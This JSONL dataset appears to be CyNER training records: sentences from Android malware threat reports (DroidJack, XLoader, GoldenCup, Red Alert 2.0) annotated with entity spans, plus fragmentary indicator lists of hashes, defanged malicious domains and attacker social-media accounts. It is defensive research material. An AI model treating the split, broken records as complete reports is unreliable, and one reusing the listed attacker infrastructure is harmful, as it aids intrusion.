{"text": "A few days back , we wrote about an Android Marcher trojan variant posing as the Super Mario Run game for Android .", "spans": {"SYSTEM: Android": [[36, 43], [106, 113]], "MALWARE: Marcher": [[44, 51]], "SYSTEM: Super Mario Run": [[81, 96]]}, "info": {"id": "cyner_train_000001", "source": "cyner_train"}}
{"text": "We have found another instance of malware posing as the Super Mario Run Android app , and this time it has taken the form of DroidJack RAT ( remote access trojan ) .", "spans": {"SYSTEM: Super Mario Run": [[56, 71]], "SYSTEM: Android": [[72, 79]], "MALWARE: DroidJack RAT": [[125, 138]]}, "info": {"id": "cyner_train_000002", "source": "cyner_train"}}
{"text": "The authors are trying to latch onto the popularity of the Super Mario Run game to target eagerly waiting Android users .", "spans": {"SYSTEM: Super Mario Run": [[59, 74]], "SYSTEM: Android": [[106, 113]]}, "info": {"id": "cyner_train_000004", "source": "cyner_train"}}
{"text": "Details : Name : Super Mario Run Package Name : net.droidjack.server MD5 : 69b4b32e4636f1981841cbbe3b927560 Technical Analysis : The malicious package claims to be the Super Mario Run game , as shown in the permissions screenshot below , but in reality this is a malicious RAT called DroidJack ( also known as SandroRAT ) that is getting installed .", "spans": {"SYSTEM: Super Mario Run": [[17, 32], [168, 183]], "MALWARE: DroidJack": [[284, 293]], "MALWARE: SandroRAT": [[310, 319]]}, "info": {"id": "cyner_train_000005", "source": "cyner_train"}}
{"text": "Once installed , the RAT registers the infected device as shown below .", "spans": {}, "info": {"id": "cyner_train_000006", "source": "cyner_train"}}
{"text": "DroidJack RAT starts capturing sensitive information like call data , SMS data , videos , photos , etc .", "spans": {"MALWARE: DroidJack RAT": [[0, 13]]}, "info": {"id": "cyner_train_000007", "source": "cyner_train"}}
{"text": "This RAT records all the calls and stores the recording to an “ .amr ” file .", "spans": {}, "info": {"id": "cyner_train_000009", "source": "cyner_train"}}
{"text": "Here , the RAT stores all the captured videos in a “ video.3gp ” file .", "spans": {}, "info": {"id": "cyner_train_000011", "source": "cyner_train"}}
{"text": "Upon further inspection , we have observed that this RAT extracts WhatsApp data too .", "spans": {"SYSTEM: WhatsApp": [[66, 74]]}, "info": {"id": "cyner_train_000013", "source": "cyner_train"}}
{"text": "The following are the DBs created and maintained by the RAT .", "spans": {}, "info": {"id": "cyner_train_000015", "source": "cyner_train"}}
{"text": "We saw the following hardcoded C & C server location in the RAT package : Conclusion : The DroidJack RAT is another example of a growing trend in which malware authors seek to exploit public interest as a way to spread malware .", "spans": {"MALWARE: DroidJack RAT": [[91, 104]]}, "info": {"id": "cyner_train_000016", "source": "cyner_train"}}
{"text": "As a reminder , it is always a good practice to download apps only from trusted app stores such as Google Play .", "spans": {"SYSTEM: Google Play": [[99, 110]]}, "info": {"id": "cyner_train_000018", "source": "cyner_train"}}
{"text": "By : Hara Hiroaki , Lilang Wu , Lorin Wu April 02 , 2019 In previous attacks , XLoader posed as Facebook , Chrome and other legitimate applications to trick users into downloading its malicious app .", "spans": {"MALWARE: XLoader": [[79, 86]], "SYSTEM: Facebook": [[96, 104]], "SYSTEM: Chrome": [[107, 113]]}, "info": {"id": "cyner_train_000021", "source": "cyner_train"}}
{"text": "Trend Micro researchers found a new variant that uses a different way to lure users .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]]}, "info": {"id": "cyner_train_000022", "source": "cyner_train"}}
{"text": "Aside from a change in its deployment techniques , a few changes in its code set it apart from its previous versions .", "spans": {}, "info": {"id": "cyner_train_000024", "source": "cyner_train"}}
{"text": "This newest variant has been labeled XLoader version 6.0 ( detected as AndroidOS_XLoader.HRXD ) , following the last version discussed in a previous research on the malware family .", "spans": {"MALWARE: XLoader": [[37, 44]]}, "info": {"id": "cyner_train_000025", "source": "cyner_train"}}
{"text": "Infection chain The threat actors behind this version used several fake websites as their host — copying that of a Japanese mobile phone operator ’ s website in particular — to trick users into downloading the fake security Android application package ( APK ) .", "spans": {"SYSTEM: Android": [[224, 231]]}, "info": {"id": "cyner_train_000026", "source": "cyner_train"}}
{"text": "Monitoring efforts on this new variant revealed that the malicious websites are spread through smishing .", "spans": {}, "info": {"id": "cyner_train_000027", "source": "cyner_train"}}
{"text": "The infection has not spread very widely at the time of writing , but we ’ ve seen that many users have already received its SMS content .", "spans": {}, "info": {"id": "cyner_train_000028", "source": "cyner_train"}}
{"text": "However , successfully installing this malicious APK requires that the user has allowed the installation of such apps as controlled in the Unknown Sources settings .", "spans": {}, "info": {"id": "cyner_train_000032", "source": "cyner_train"}}
{"text": "The infection chain is slightly more roundabout in the case of Apple devices .", "spans": {"SYSTEM: Apple": [[63, 68]]}, "info": {"id": "cyner_train_000034", "source": "cyner_train"}}
{"text": "If the user installs the profile , the malicious website will open , revealing it to be an Apple phishing site , as seen in figure 2 .", "spans": {"ORGANIZATION: Apple": [[91, 96]]}, "info": {"id": "cyner_train_000040", "source": "cyner_train"}}
{"text": "However , as mentioned earlier , an analysis of this new variant showed some changes in its code in line with its new deployment method .", "spans": {}, "info": {"id": "cyner_train_000042", "source": "cyner_train"}}
{"text": "We discuss these changes and its effect on Android and Apple devices .", "spans": {"SYSTEM: Android": [[43, 50]], "SYSTEM: Apple": [[55, 60]]}, "info": {"id": "cyner_train_000043", "source": "cyner_train"}}
{"text": "Malicious APK Like its previous versions , XLoader 6.0 abuses social media user profiles to hide its real C & C addresses , but this time its threat actors chose the social media platform Twitter , which was never used in previous attacks .", "spans": {"MALWARE: XLoader 6.0": [[43, 54]], "ORGANIZATION: Twitter": [[188, 195]]}, "info": {"id": "cyner_train_000044", "source": "cyner_train"}}
{"text": "The real C & C address is encoded in the Twitter names , and can only be revealed once decoded .", "spans": {"ORGANIZATION: Twitter": [[41, 48]]}, "info": {"id": "cyner_train_000045", "source": "cyner_train"}}
{"text": "Version 6.0 also adds a command called “ getPhoneState ” , which collects unique identifiers of mobile devices such as IMSI , ICCID , Android ID , and device serial number .", "spans": {"SYSTEM: Android": [[134, 141]]}, "info": {"id": "cyner_train_000048", "source": "cyner_train"}}
{"text": "This addition is seen in Figure 5 .", "spans": {}, "info": {"id": "cyner_train_000049", "source": "cyner_train"}}
{"text": "Malicious iOS profile In the case of Apple devices , the downloaded malicious iOS profile gathers the following : Unique device identifier ( UDID ) International Mobile Equipment Identity ( IMEI ) Integrated Circuit Card ID ( ICCID ) Mobile equipment identifier ( MEID ) Version number Product number The profile installations differ depending on the iOS .", "spans": {"SYSTEM: iOS": [[10, 13], [78, 81], [351, 354]], "SYSTEM: Apple": [[37, 42]]}, "info": {"id": "cyner_train_000051", "source": "cyner_train"}}
{"text": "For versions 11.0 and 11.4 , the installation is straightforward .", "spans": {}, "info": {"id": "cyner_train_000052", "source": "cyner_train"}}
{"text": "If a user visits the profile host website and allows the installer to download , the iOS system will go directly to the “ Install Profile ” page ( which shows a verified safety certificate ) , and then request the users ’ passcode for the last step of installation .", "spans": {"SYSTEM: iOS": [[85, 88]]}, "info": {"id": "cyner_train_000053", "source": "cyner_train"}}
{"text": "On later versions , specifically iOS 12.1.1 and iOS 12.2 , the process is different .", "spans": {"SYSTEM: iOS 12.1.1": [[33, 43]], "SYSTEM: iOS 12.2": [[48, 56]]}, "info": {"id": "cyner_train_000054", "source": "cyner_train"}}
{"text": "After the profile is downloaded , the iOS system will first ask users to review the profile in their settings if they want to install it .", "spans": {"SYSTEM: iOS": [[38, 41]]}, "info": {"id": "cyner_train_000055", "source": "cyner_train"}}
{"text": "The phishing site uses the gathered information as its GET parameter , allowing the attacker to access the stolen information .", "spans": {}, "info": {"id": "cyner_train_000060", "source": "cyner_train"}}
{"text": "The \" porn kr sex '' APK connects to a malicious website that runs XLoader in the background .", "spans": {"MALWARE: XLoader": [[67, 74]]}, "info": {"id": "cyner_train_000062", "source": "cyner_train"}}
{"text": "This attack , however , seems exclusive to Android users , as it does not have the code to attack iOS devices .", "spans": {"SYSTEM: Android": [[43, 50]], "SYSTEM: iOS": [[98, 101]]}, "info": {"id": "cyner_train_000064", "source": "cyner_train"}}
{"text": "Succeeding monitoring efforts revealed a newer variant that exploits the social media platforms Instagram and Tumblr instead of Twitter to hide its C & C address .", "spans": {"ORGANIZATION: Instagram": [[96, 105]], "ORGANIZATION: Tumblr": [[110, 116]], "ORGANIZATION: Twitter": [[128, 135]]}, "info": {"id": "cyner_train_000065", "source": "cyner_train"}}
{"text": "We labeled this new variant XLoader version 7.0 , because of the different deployment method and its use of the native code to load the payload and hide in Instagram and Tumblr profiles .", "spans": {"MALWARE: XLoader": [[28, 35]], "ORGANIZATION: Instagram": [[156, 165]], "ORGANIZATION: Tumblr": [[170, 176]]}, "info": {"id": "cyner_train_000066", "source": "cyner_train"}}
{"text": "These more recent developments indicate that XLoader is still evolving .", "spans": {"MALWARE: XLoader": [[45, 52]]}, "info": {"id": "cyner_train_000067", "source": "cyner_train"}}
{"text": "The emergence of XLoader 6.0 does not only indicate that the threat actors behind it remain active ; it also holds fresh evidence of its connection to FakeSpy .", "spans": {"MALWARE: XLoader 6.0": [[17, 28]], "MALWARE: FakeSpy": [[151, 158]]}, "info": {"id": "cyner_train_000069", "source": "cyner_train"}}
{"text": "It had again cloned a different legitimate Japanese website to host its malicious app , similar to what FakeSpy had also done before .", "spans": {"MALWARE: FakeSpy": [[104, 111]]}, "info": {"id": "cyner_train_000071", "source": "cyner_train"}}
{"text": "Their similarity is made more apparent by looking at their naming method for downloadable files , domain structure of fake websites and other details of their deployment techniques , exemplified in figure 10 .", "spans": {}, "info": {"id": "cyner_train_000072", "source": "cyner_train"}}
{"text": "XLoader 6.0 also mirrors the way FakeSpy hides its real C & C server .", "spans": {"MALWARE: XLoader 6.0": [[0, 11]], "MALWARE: FakeSpy": [[33, 40]]}, "info": {"id": "cyner_train_000073", "source": "cyner_train"}}
{"text": "When before it had used several different social media platforms , it now uses the Twitter platform , something FakeSpy has done in its past attacks .", "spans": {"ORGANIZATION: Twitter": [[83, 90]], "MALWARE: FakeSpy": [[112, 119]]}, "info": {"id": "cyner_train_000074", "source": "cyner_train"}}
{"text": "Analysis of the malicious iOS profile also revealed further connections , as the profile can also be downloaded from a website that FakeSpy deployed early this year .", "spans": {"SYSTEM: iOS": [[26, 29]], "MALWARE: FakeSpy": [[132, 139]]}, "info": {"id": "cyner_train_000075", "source": "cyner_train"}}
{"text": "This newest entry seems to indicate that these changes won ’ t be stopping soon .", "spans": {}, "info": {"id": "cyner_train_000077", "source": "cyner_train"}}
{"text": "Being aware of this fact can help create defensive strategies , as well as prepare for upcoming attacks .", "spans": {}, "info": {"id": "cyner_train_000078", "source": "cyner_train"}}
{"text": "In addition , just as uncovering new characteristics is important , finding ones we ’ ve also seen in a different malware family like FakeSpy also provides valuable insight .", "spans": {"MALWARE: FakeSpy": [[134, 141]]}, "info": {"id": "cyner_train_000079", "source": "cyner_train"}}
{"text": "Perhaps more information on XLoader will be known in the future .", "spans": {"MALWARE: XLoader": [[28, 35]]}, "info": {"id": "cyner_train_000081", "source": "cyner_train"}}
{"text": "For now , users can make the best of the knowledge they have now to significantly reduce the effectivity of such malware .", "spans": {}, "info": {"id": "cyner_train_000082", "source": "cyner_train"}}
{"text": "Users of iOS can remove the malicious profile using the Apple Configurator 2 , Apple ’ s official iOS helper app for managing Apple devices .", "spans": {"SYSTEM: iOS": [[9, 12], [98, 101]], "ORGANIZATION: Apple": [[56, 61], [79, 84], [126, 131]]}, "info": {"id": "cyner_train_000083", "source": "cyner_train"}}
{"text": "Following simple best practices , like strictly downloading applications or any files from trusted sources and being wary of unsolicited messages , can also prevent similar attacks from compromising devices .", "spans": {}, "info": {"id": "cyner_train_000084", "source": "cyner_train"}}
{"text": "Indicators of Compromise SHA256 Package App label 332e68d865009d627343b89a5744843e3fde4ae870193f36b82980363439a425 ufD.wykyx.vlhvh SEX kr porn 403401aa71df1830d294b78de0e5e867ee3738568369c48ffafe1b15f3145588 ufD.wyjyx.vahvh 佐川急便 466dafa82a4460dcad722d2ad9b8ca332e9a896fc59f06e16ebe981ad3838a6b", "spans": {}, "info": {"id": "cyner_train_000085", "source": "cyner_train"}}
{"text": "com.dhp.ozqh Facebook 5022495104c280286e65184e3164f3f248356d065ad76acef48ee2ce244ffdc8 ufD.wyjyx.vahvh Anshin Scan a0f3df39d20c4eaa410a61a527507dbc6b17c7f974f76e13181e98225bda0511 com.aqyh.xolo 佐川急便 cb412b9a26c1e51ece7a0e6f98f085e1c27aa0251172bf0a361eb5d1165307f7", "spans": {"ORGANIZATION: Facebook": [[13, 21]]}, "info": {"id": "cyner_train_000086", "source": "cyner_train"}}
{"text": "jp.co.sagawa.SagawaOfficialApp 佐川急便 Malicious URLs : hxxp : //38 [ .", "spans": {}, "info": {"id": "cyner_train_000087", "source": "cyner_train"}}
{"text": "] com hxxp : //apple-icloud [ .", "spans": {}, "info": {"id": "cyner_train_000092", "source": "cyner_train"}}
{"text": "] com/ hxxp : //files.spamo [ .", "spans": {}, "info": {"id": "cyner_train_000096", "source": "cyner_train"}}
{"text": "] com hxxp : //mailsa-qau [ .", "spans": {}, "info": {"id": "cyner_train_000099", "source": "cyner_train"}}
{"text": "] com hxxp : //mailsa-qaw [ .", "spans": {}, "info": {"id": "cyner_train_000100", "source": "cyner_train"}}
{"text": "] com hxxp : //mailsa-wqq [ .", "spans": {}, "info": {"id": "cyner_train_000104", "source": "cyner_train"}}
{"text": "] com hxxp : //mailsa-wqw [ .", "spans": {}, "info": {"id": "cyner_train_000106", "source": "cyner_train"}}
{"text": "] com hxxp : //nttdocomo-qae [ .", "spans": {}, "info": {"id": "cyner_train_000107", "source": "cyner_train"}}
{"text": "] com hxxp : //nttdocomo-qat [ .", "spans": {}, "info": {"id": "cyner_train_000111", "source": "cyner_train"}}
{"text": "] com hxxp : //nttdocomo-qaw [ .", "spans": {}, "info": {"id": "cyner_train_000112", "source": "cyner_train"}}
{"text": "] com/ hxxp : //www [ .", "spans": {}, "info": {"id": "cyner_train_000114", "source": "cyner_train"}}
{"text": "] com hxxp : //www [ .", "spans": {}, "info": {"id": "cyner_train_000116", "source": "cyner_train"}}
{"text": "] com Malicious Twitter accounts : https : //twitter.com/lucky88755 https : //twitter.com/lucky98745 https : //twitter.com/lucky876543 https : //twitter.com/luckyone1232 https : //twitter.com/sadwqewqeqw https : //twitter.com/gyugyu87418490 https : //twitter.com/fdgoer343 https : //twitter.com/sdfghuio342 https : //twitter.com/asdqweqweqeqw https : //twitter.com/ukenivor3", "spans": {"ORGANIZATION: Twitter": [[16, 23]]}, "info": {"id": "cyner_train_000124", "source": "cyner_train"}}
{"text": "Malicious Instagram account : https : //www.instagram.com/freedomguidepeople1830/ Malicious Tumblr accounts : https : //mainsheetgyam.tumblr.com/ https : //hormonaljgrj.tumblr.com/ https : //globalanab.tumblr.com/ C & C addresses : 104 [ .", "spans": {"ORGANIZATION: Instagram": [[10, 19]], "ORGANIZATION: Tumblr": [[92, 98]]}, "info": {"id": "cyner_train_000125", "source": "cyner_train"}}
{"text": "] 132:28855 GoldenCup : New Cyber Threat Targeting World Cup Fans As the World Cup launches , so does a new threat Officials from the Israeli Defense Force recently uncovered an Android Spyware campaign targeting Israeli soldiers and orchestrated by \" Hamas .", "spans": {"MALWARE: GoldenCup": [[12, 21]], "ORGANIZATION: Israeli Defense Force": [[134, 155]], "SYSTEM: Android": [[178, 185]], "ORGANIZATION: Hamas": [[252, 257]]}, "info": {"id": "cyner_train_000155", "source": "cyner_train"}}
{"text": "'' The latest samples attributed to this campaign were discovered by security researchers from ClearSky .", "spans": {"ORGANIZATION: ClearSky": [[95, 103]]}, "info": {"id": "cyner_train_000156", "source": "cyner_train"}}
{"text": "In our research , we focus on the most recent sample , an application dubbed as \" Golden Cup '' , launched just before the start of World Cup 2018 .", "spans": {"MALWARE: Golden Cup": [[82, 92]]}, "info": {"id": "cyner_train_000157", "source": "cyner_train"}}
{"text": "Distribution / Infection When this campaign started at the start of 2018 , the malware ( \" GlanceLove '' , \" WinkChat '' ) was distributed by the perpetrators mainly via fake Facebook profiles , attempting to seduce IDF soldiers to socialize on a different platform ( their malware ) .", "spans": {"MALWARE: GlanceLove": [[91, 101]], "MALWARE: WinkChat": [[109, 117]], "SYSTEM: Facebook": [[175, 183]]}, "info": {"id": "cyner_train_000158", "source": "cyner_train"}}
{"text": "As this approach was not a great success , their last attempt was to quickly create a World Cup app and this time distribute it to Israeli citizens , not just soldiers .", "spans": {}, "info": {"id": "cyner_train_000159", "source": "cyner_train"}}
{"text": "The short URL redirects to the application page at Google Play .", "spans": {"SYSTEM: Google Play": [[51, 62]]}, "info": {"id": "cyner_train_000161", "source": "cyner_train"}}
{"text": "We assume it was rushed because , unlike GlanceLove , it lacked any real obfuscation .", "spans": {"MALWARE: GlanceLove": [[41, 51]]}, "info": {"id": "cyner_train_000164", "source": "cyner_train"}}
{"text": "Even the C & C server side was mostly exposed with the file listing available for everyone to traverse through it .", "spans": {}, "info": {"id": "cyner_train_000165", "source": "cyner_train"}}
{"text": "It contained approximately 8GB of stolen data .", "spans": {}, "info": {"id": "cyner_train_000166", "source": "cyner_train"}}
{"text": "A recent whois of “ goldncup.com ” .", "spans": {}, "info": {"id": "cyner_train_000167", "source": "cyner_train"}}
{"text": "In addition , it collects identifiers and some data from the device .", "spans": {}, "info": {"id": "cyner_train_000173", "source": "cyner_train"}}
{"text": "After getting a command from the C & C , the app is able to download a malicious payload in the form of a .dex file that is being dynamically loaded adding the additional malicious capabilities .", "spans": {}, "info": {"id": "cyner_train_000174", "source": "cyner_train"}}
{"text": "In this way , the malware authors can submit their app and add the malicious capabilities only after their app is live on the Play Store .", "spans": {"SYSTEM: Play Store": [[126, 136]]}, "info": {"id": "cyner_train_000175", "source": "cyner_train"}}
{"text": "Initiating the MQTT client .", "spans": {}, "info": {"id": "cyner_train_000177", "source": "cyner_train"}}
{"text": "The app connects to the MQTT broker with hardcoded username and password and a unique device identifier generated for each device .", "spans": {}, "info": {"id": "cyner_train_000180", "source": "cyner_train"}}
{"text": "The MQTT connection to broker The MQTT connection to broker The MQTT communication is used primarily to update the device state and get commands from the C & C .", "spans": {}, "info": {"id": "cyner_train_000181", "source": "cyner_train"}}
{"text": "It uses different topics that include the unique device identifier , which side is sending the message , and whether it is information message or command .", "spans": {}, "info": {"id": "cyner_train_000182", "source": "cyner_train"}}
{"text": "HTTP Communication In addition to the MQTT communication , the app also uses plain text HTTP communication in order to download the .dex file and upload collected data .", "spans": {}, "info": {"id": "cyner_train_000183", "source": "cyner_train"}}
{"text": "All of the files that are being uploaded or downloaded are zip files encrypted by AES with ECB mode .", "spans": {}, "info": {"id": "cyner_train_000184", "source": "cyner_train"}}
{"text": "The key for each file is generated randomly and stored in the encrypted file with a fixed offset .", "spans": {}, "info": {"id": "cyner_train_000185", "source": "cyner_train"}}
{"text": "In order to upload the file , the app uses a basic REST communication with the server , checking if the file exists and uploading it if it isn ’ t .", "spans": {}, "info": {"id": "cyner_train_000186", "source": "cyner_train"}}
{"text": "The path that is used for the uploads is : http : // /apps/d/p/op.php The communication looks like this : First Phase The first phase of the app ’ s attack flow collects device information and a list of apps installed on the device .", "spans": {}, "info": {"id": "cyner_train_000187", "source": "cyner_train"}}
{"text": "The collection of basic device information .", "spans": {}, "info": {"id": "cyner_train_000189", "source": "cyner_train"}}
{"text": "In addition , at this stage the app can process one of these commands : • Collect device info • Install app • Is online ?", "spans": {}, "info": {"id": "cyner_train_000191", "source": "cyner_train"}}
{"text": "• Change server domain Out of these , the most interesting command is the “ install app ” command that downloads an encrypted zip file containing the second phase dex file , unpacks and loads it .", "spans": {}, "info": {"id": "cyner_train_000192", "source": "cyner_train"}}
{"text": "Second Phase The second phase dex file contains 3 main services that are being used : • ConnManager - handles connections to the C & C • ReceiverManager - waits for incoming calls / app installations • TaskManager - manages the data collection tasks The C & C server address is different than the one that is used by the first phase , so the app reconnects to the new server as well as starts the periodic data collector tasks .", "spans": {}, "info": {"id": "cyner_train_000193", "source": "cyner_train"}}
{"text": "By analyzing the TaskManager class we can see the new commands that are supported at this stage : As can be seen in the code snippet above , there are quite a lot of data collection tasks that are now available : Collect device info Track location Upload contacts information Upload sent and received SMS messages Upload images Upload video files Send recursive dirlist of the external storage Upload specific files Record audio using the microphone Record calls Use the camera to capture bursts of snapshots Those tasks can either run periodically , on event ( such as incoming call ) or when getting", "spans": {}, "info": {"id": "cyner_train_000194", "source": "cyner_train"}}
{"text": "a command from the C & C server .", "spans": {}, "info": {"id": "cyner_train_000195", "source": "cyner_train"}}
{"text": "Mitigations Stay protected from mobile malware by taking these precautions : Do not download apps from unfamiliar sites Only install apps from trusted sources Pay close attention to the permissions requested by apps Install a suitable mobile security app , such as SEP Mobile or Norton , to protect your device and data Keep your operating system up to date Make frequent backups of important data Indicators of Compromise ( IoCs ) Package names : anew.football.cup.world.com.worldcup com.coder.glancelove com.winkchat APK SHA2 : 166f3a863bb2b66bda9c76dccf9529d5237f6394721f46635b053870eb2fcc5a", "spans": {}, "info": {"id": "cyner_train_000196", "source": "cyner_train"}}
{"text": "b45defca452a640b303288131eb64c485f442aae0682a3c56489d24d59439b47 d9601735d674a9e55546fde0bffde235bc5f2546504b31799d874e8c31d5b6e9 2ce54d93510126fca83031f9521e40cd8460ae564d3d927e17bd63fb4cb20edc 67b1a1e7b505ac510322b9d4f4fc1e8a569d6d644582b588faccfeeaa4922cb7", "spans": {}, "info": {"id": "cyner_train_000197", "source": "cyner_train"}}
{"text": "1664cb343ee830fa94725fed143b119f7e2351307ed0ce04724b23469b9002f2 Loaded DEX SHA2 : afaf446a337bf93301b1d72855ccdd76112595f6e4369d977bea6f9721edf37e Domain/IP : goldncup [ .", "spans": {}, "info": {"id": "cyner_train_000198", "source": "cyner_train"}}
{"text": "] com glancelove [ .", "spans": {}, "info": {"id": "cyner_train_000199", "source": "cyner_train"}}
{"text": "] com autoandroidup [ .", "spans": {}, "info": {"id": "cyner_train_000200", "source": "cyner_train"}}
{"text": "] website mobilestoreupdate [ .", "spans": {}, "info": {"id": "cyner_train_000201", "source": "cyner_train"}}
{"text": "] website updatemobapp [ .", "spans": {}, "info": {"id": "cyner_train_000202", "source": "cyner_train"}}
{"text": "] 147 Red Alert 2.0 : Android Trojan targets security-seekers A malicious , counterfeit version of a VPN client for mobile devices targets security-minded victims with a RAT .", "spans": {"MALWARE: Red Alert 2.0": [[6, 19]], "SYSTEM: Android": [[22, 29]], "SYSTEM: VPN": [[101, 104]]}, "info": {"id": "cyner_train_000209", "source": "cyner_train"}}
{"text": "Written by Jagadeesh Chandraiah JULY 23 , 2018 SophosLabs has uncovered a mobile malware distribution campaign that uses advertising placement to distribute the Red Alert Trojan , linking counterfeit branding of well-known apps to Web pages that deliver an updated , 2.0 version of this bank credential thief .", "spans": {"ORGANIZATION: SophosLabs": [[47, 57]], "MALWARE: Red Alert Trojan": [[161, 177]]}, "info": {"id": "cyner_train_000210", "source": "cyner_train"}}
{"text": "The group distributing this family of malware decorates it in the branding and logos of well-known social media or media player apps , system update patches , or ( in its most recent campaign ) VPN client apps in an attempt to lure users into downloading , installing , and elevating the privileges of a Trojanized app hosted on a site not affiliated with any reputable app market or store .", "spans": {"SYSTEM: VPN": [[194, 197]]}, "info": {"id": "cyner_train_000211", "source": "cyner_train"}}
{"text": "Aside from the inescapable irony of disguising a security-reducing Trojan as an ostensibly security-enhancing app , and the righteous affront to the whole concept of a VPN ’ s purpose a Trojan so disguised inspires , this represents an escalation in the variety of app types targeted by this campaign of bankbots in disguise .", "spans": {}, "info": {"id": "cyner_train_000212", "source": "cyner_train"}}
{"text": "Red Alert Plays Dress-Up In the wild , we found Web pages designed to ( vaguely ) resemble legitimate app market pages , hosting files for download that have been disguised as a legitimate mobile application of moderately broad appeal , such as a media player or social media app .", "spans": {"MALWARE: Red Alert": [[0, 9]]}, "info": {"id": "cyner_train_000213", "source": "cyner_train"}}
{"text": "But the categories targeted by this group seem to be broadening with the inclusion of VPN software .", "spans": {"SYSTEM: VPN": [[86, 89]]}, "info": {"id": "cyner_train_000214", "source": "cyner_train"}}
{"text": "The Web page shown here on the left is hosted on a domain that seems apt : free-vpn [ .", "spans": {}, "info": {"id": "cyner_train_000215", "source": "cyner_train"}}
{"text": "In addition to “ Free VPN Master Android , ” we ’ ve observed Red Alert 2.0 Trojans in the wild disguising themselves using names like : Flash Player or Update Flash Player Android Update or Android Antivirus Chrome Update or Google Update Update Google Market WhatsApp Viber OneCoin Wallet Pornhub Tactic FlashLight or PROFlashLight Finanzonline The vast majority of in-the-wild Red Alert 2.0 samples falsely present themselves as Adobe Flash player for Android , a utility that Adobe stopped supporting years ago .", "spans": {"SYSTEM: Free VPN Master Android": [[17, 40]], "MALWARE: Red Alert 2.0": [[62, 75]], "SYSTEM: Flash Player": [[137, 149]], "SYSTEM: Update Flash Player": [[153, 172]], "SYSTEM: Android Update": [[173, 187]], "SYSTEM: Android Antivirus": [[191, 208]], "SYSTEM: Chrome Update": [[209, 222]], "SYSTEM: Google Update": [[226, 239]], "SYSTEM: Update Google Market": [[240, 260]], "SYSTEM: WhatsApp": [[261, 269]], "SYSTEM: Viber": [[270, 275]], "SYSTEM: OneCoin": [[276, 283]], "SYSTEM: Wallet": [[284, 290]], "MALWARE: Red Alert 2.0 samples": [[380, 401]], "SYSTEM: Adobe Flash player": [[432, 450]], "SYSTEM: Android": [[455, 462]], "ORGANIZATION: Adobe": [[480, 485]]}, "info": {"id": "cyner_train_000220", "source": "cyner_train"}}
{"text": "The Red Alert Payload Once installed , the malware requests Device Administrator privileges .", "spans": {"MALWARE: Red Alert Payload": [[4, 21]]}, "info": {"id": "cyner_train_000222", "source": "cyner_train"}}
{"text": "The Trojan works by creating an overlay whenever the user launches the banking application .", "spans": {}, "info": {"id": "cyner_train_000226", "source": "cyner_train"}}
{"text": "Currently Running Applications Banking Trojans that rely on the overlay mechanism to steal information need to know what application is in the foreground .", "spans": {}, "info": {"id": "cyner_train_000227", "source": "cyner_train"}}
{"text": "To prevent this , Android ’ s engineers regularly release updates that contain bug fixes designed to prevent apps from getting the list of currently running apps without explicit permission .", "spans": {"SYSTEM: Android": [[18, 25]]}, "info": {"id": "cyner_train_000230", "source": "cyner_train"}}
{"text": "With every Android update , the malware authors are forced to come up with new tricks .", "spans": {"SYSTEM: Android": [[11, 18]]}, "info": {"id": "cyner_train_000231", "source": "cyner_train"}}
{"text": "This particular case is not an exception .", "spans": {}, "info": {"id": "cyner_train_000232", "source": "cyner_train"}}
{"text": "The author ( s ) of this malware wrote separate subroutines that identify the operating system version and fire off methods to obtain a list of currently running applications known to work on that particular version of Android .", "spans": {"SYSTEM: Android": [[219, 226]]}, "info": {"id": "cyner_train_000233", "source": "cyner_train"}}
{"text": "If that doesn ’ t work , they try to use queryUsageStats : When the malware invokes queryUsageStats , it asks for the list of applications that ran in the last 1 million milliseconds ( 16 minutes and 40 seconds ) .", "spans": {}, "info": {"id": "cyner_train_000235", "source": "cyner_train"}}
{"text": "String Resources Used to Store App Data Red Alert 2.0 stores its data in an atypical location ( inside the Strings.xml file embedded in the app ) to fetch its critical data , such as the C2 address .", "spans": {"MALWARE: Red Alert 2.0": [[40, 53]]}, "info": {"id": "cyner_train_000236", "source": "cyner_train"}}
{"text": "It ’ s been SophosLabs ’ observation that Red Alert Trojans usually have a randomized internal name like this .", "spans": {"MALWARE: Red Alert Trojans": [[42, 59]]}, "info": {"id": "cyner_train_000238", "source": "cyner_train"}}
{"text": "The strings section of the app contains embedded command-and-control IP addresses , ports , and domain names in plaintext .", "spans": {}, "info": {"id": "cyner_train_000239", "source": "cyner_train"}}
{"text": "The malware can execute a variety of arbitrary commands , including ( for example ) intercepting or sending text messages without the user ’ s knowledge , obtaining a copy of the victim ’ s Address Book , or call or text message logs , or sending phone network feature codes ( also known as USSD codes ) .", "spans": {"SYSTEM: Address Book": [[190, 202]]}, "info": {"id": "cyner_train_000241", "source": "cyner_train"}}
{"text": "C2 and Targeted Banks As described earlier , the C2 domain is kept in the app ’ s resources .", "spans": {}, "info": {"id": "cyner_train_000242", "source": "cyner_train"}}
{"text": "During the app execution , the malware contacts C2 domain for further instructions .", "spans": {}, "info": {"id": "cyner_train_000243", "source": "cyner_train"}}
{"text": "Most of the network traffic we ’ ve observed is HTTP .", "spans": {}, "info": {"id": "cyner_train_000244", "source": "cyner_train"}}
{"text": "The C2 address , as stored in samples we ’ ve seen , comprise both an IP address and port number ; So far , all the samples we ’ ve tested attempted to contact an IP address on port 7878/tcp .", "spans": {}, "info": {"id": "cyner_train_000245", "source": "cyner_train"}}
{"text": "Static analysis of the code reveals that the malware downloads the overlay template to use against any of the bank ( s ) it is targeting .", "spans": {}, "info": {"id": "cyner_train_000247", "source": "cyner_train"}}
{"text": "The malware also sends regular telemetry back to its C2 server about the infected device in the form of an HTTP POST to its C2 server .", "spans": {}, "info": {"id": "cyner_train_000248", "source": "cyner_train"}}
{"text": "It uses the base Dalvik User-Agent string for the device it ’ s running on .", "spans": {}, "info": {"id": "cyner_train_000249", "source": "cyner_train"}}
{"text": "The content of the HTTP POST data is telemetry data in a json format about the device the malware is running on .", "spans": {}, "info": {"id": "cyner_train_000250", "source": "cyner_train"}}
{"text": "The list of banks targeted by Red Alert 2.0 includes NatWest , Barclays , Westpac , and Citibank .", "spans": {"MALWARE: Red Alert 2.0": [[30, 43]], "ORGANIZATION: Barclays": [[63, 71]]}, "info": {"id": "cyner_train_000251", "source": "cyner_train"}}
{"text": "We expect to see more diversification in the social engineering lures this threat group employs as time goes on .", "spans": {}, "info": {"id": "cyner_train_000253", "source": "cyner_train"}}
{"text": "So far , legitimate app stores appear to be this malware ’ s Achilles heel ; disabling the installation of third-party apps has been an effective prevention measure .", "spans": {}, "info": {"id": "cyner_train_000254", "source": "cyner_train"}}
